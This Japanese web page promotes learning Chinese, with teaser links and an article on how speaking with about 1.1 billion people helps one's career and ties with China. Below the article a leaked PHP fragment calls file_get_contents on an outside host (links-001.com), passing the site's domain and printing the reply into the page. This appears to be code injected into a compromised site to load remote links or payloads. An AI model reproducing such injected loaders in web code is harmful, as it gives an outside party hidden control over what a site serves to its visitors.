前へ
次へ

日本語のゲームを中国語に切り替えて学習教材に

ゲームをプレイする人の中には、中国語ができたらいいと思う人も少なくありません。オンラインゲームでは中

more

中国語の学習なら外国語会話のスクールを利用

英語を学びたいときに学べるところとして英会話スクールがあります。誰でも気楽に通えるよう駅前などにあり

more

中国語の学習を前向きに検討しているなら

今から実際に、中国語の学習を前向きに検討しているのであれば、どこで勉強するのが得策なのかをしっかりと

more

世界11億人と会話ができるチャンス中国語学習

世界の共通言語は英語と言われるように、英語力はこれからのグローバル時代を駆け抜けていくために必須です。幼いころから英語を学ぶことで、大人になってから言葉で大変な思いをすることはありません。そんな英語と比べた時に、中国語は比較的競争率は高くはないものの、この先の未来にも必要になる言葉の一つです。なぜ積極的に英語に負けないくらい学習をしたほうが良いかですが、たくさんの人と関わることができるため世界を広げることができます。母国語として中国語を普段から喋っているのは、日本人の印象からしたら広い中国大陸にいる人たちだけのイメージがあります。ところが世界でもナンバー1の母国語は中国語と言われていて、台湾や東南アジアでも使われている言葉だからです。世界中でどれくらいの人が母国語として使っているのか、日常的に使っているかですが、およそ11億人とも言われています。つまり学習をすることによって、世界の11億人と話ができるということにもなるため、世界は一気に広がるわけです。コミュニケーション数は圧倒的な人数になりますし、キャッチできる情報量のボリュームまでパワーアップをします。人とのつながりを広げることができるのと共に、ビジネスでのラッキーチャンスをつかみやすくなるのも利点です。昔は中国といえば産業は工事の印象があったものの、巨大マーケットに登りつめているのも中国であり、経済大国として成功をしています。日本とはお隣同士の国なのですから、その国の言語をマスターすることで、仕事でのチャンスを掴めるかもしれません。言葉が話せてその国の人と現地の言葉で会話ができることで、相手ももっとこちらを信頼するようになりますし、ビジネス展開をするにしても好都合です。海外に目を向ける日本企業としても、中国語を習得してスムーズに会話のできる人材は貴重な存在になり、会社でも重宝をされます。自分の意欲を満たすだけではなく、会社にも大きく貢献できるのも喜ばしい点です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top